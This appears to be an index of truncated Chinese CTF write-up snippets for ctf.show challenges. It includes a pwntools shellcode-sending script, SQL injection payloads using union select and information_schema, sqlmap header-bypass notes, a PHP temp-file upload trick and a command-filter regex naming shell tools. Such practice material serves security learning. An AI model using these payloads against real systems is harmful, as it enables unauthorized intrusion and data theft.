pwn24 #coding:utf8 from pwn import * #context(arch = 'amd64',os = 'linux',log_level = 'debug') context(arch = 'i386',os = 'linux',log_level = 'debug') #io = process('./pwn') io = remote('pwn.challenge.ctf.show',28200) payload = asm(shellcraft.sh()) io.sendline(payload...
也是所有字母被过滤,首先构造一个post上传文件的前端数据包(在vscode中:post文件上传) 发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。 上传一个web56.php文件,文件内容为 #!/bin/shls 在题目文件文件夹里 注:shell...
//拼接sql语句查找指定ID用户$sql="select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; 无过滤的字符型注入。 payload:1'or'1'='1 滑到底找到flag。 web172 //拼接sql语句查找指定ID用户$sql="select username,password from ctfshow_user2 where ...
web171首先尝试1'--+,发现有返回值;说明直接闭合正确;接着找用来输出的列:1' order by 3--+,发现一共有3行(就1,2,3,4,5慢慢试出来)查看数据库:1' union select 1,2,database()--+得到数据库名为ctfshow_web爆破表名:-1' union select 1,2,group_concat(table_name) FROM information_schema....
web36 error_reporting(0);if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i",$c)){eval($c); } }else{highlight_file(__FILE__); ...
web171 首先尝试1'--+,发现有返回值;说明直接闭合正确; 接着找用来输出的列:1' order by 3--+,发现一共有3行(就1,2,3,4,5慢慢试出来) 查看数据库:1' union select 1,2,database()--+得到数据库名为ctfshow_web 爆破表名:-1' union select 1,2,group_concat(table_name) FROM information_sche...
web647 读取的page.php刚开始看到一个传参点,sqlmap跑一下 image-20230805153432337 存在注入 image-20230805153546825 在ctfshow_secret这个表里得到了一个flag image-20230805153703206 得到了key key_is_here_you_know image-20230805153840718 继续回过头,刚才的user.php的源码其实是有647的cat,看一下如何满足条件 image...
web201sqlmap 工具使用练习。 题目提示 --user-agent 指定 user-agent,实际上不是 sqlmap 的 ua 还不让访问,测试 ua sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org) 可用。 题目还指定使用 --referer 绕过 referer 检查,带着 sqlmap 的 ua 访问会提示“打击盗版人人有责,你都不是从ctf.show来的”,故指定 ...
具体可见新春欢乐赛的web2,本质是通过设置sessionid的值,在通过session_id这个无参函数来获得目标值 648 继续审计user.php function evilClass($m,$k){classctfshow{public$m;publicfunction construct($m){ $this->$m=$m; } } $ctfshow=newctfshow($m); ...
web176 解法一 解法二 web177 web 178 解法一 解法二 web179 解法一 解法二 web180-182 ...